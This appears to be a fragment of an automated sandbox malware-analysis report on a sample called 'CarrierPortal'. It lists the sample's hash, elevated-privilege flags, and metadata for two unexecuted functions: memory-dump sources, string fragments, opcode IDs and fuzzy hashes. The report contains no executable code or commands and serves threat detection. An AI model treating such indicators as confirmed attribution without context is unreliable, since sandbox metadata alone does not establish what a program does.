                                                                  MD5 hash:58D5BC7895F7F32EE308E34F06F25DD5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Non-executed Functions

                                                                    Function 00000146244C9B2A Relevance: 11.4, Strings: 8, Instructions: 1403COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1282205867.00000146244BC000.00000004.00000020.00020000.00000000.sdmp, Offset: 00000146244BC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_146244bc000_CarrierPortal.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8f08$C:\U$user$Cons$Wind$\Use$\\CA$user
                                                                    • API String ID: 0-1711692963
                                                                    • Opcode ID: 2dc819bd4b109ec4a80fe83f5a40ca577545bd6007848d12a1232f4e1e4d8408
                                                                    • Instruction ID: 03ab72803e3337ec5c80c8564833b41e26ccdd059c689bb5bf3c641cb40f1cc7
                                                                    • Opcode Fuzzy Hash: 2dc819bd4b109ec4a80fe83f5a40ca577545bd6007848d12a1232f4e1e4d8408
                                                                    • Instruction Fuzzy Hash: 54E127A500E7C56FD31787309C69AA17FB4AF53218B0E86EBC4C1CF5E3D259494AC762
                                                                    Function 0000014625021738 Relevance: .4, Instructions: 431COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1284973930.000001462501E000.00000004.00000001.00040000.00000003.sdmp, Offset: 000001462501E000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1462501e000_CarrierPortal.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 66ddcab0168562b4cae9729ac3466f126074edb4e3fab54897de1a30479178ff
                                                                    • Instruction ID: f4c661c14626d6f261e242f8018524a28fb379bbd84bd66580d4abb127c04221
                                                                    • Opcode Fuzzy Hash: 66ddcab0168562b4cae9729ac3466f126074edb4e3fab54897de1a30479178ff
                                                                    • Instruction Fuzzy Hash: 4802EB6244E3C16FD7138B348C6AA927FB0AF17214B0E05DBC4C1CF8A3E259595AC763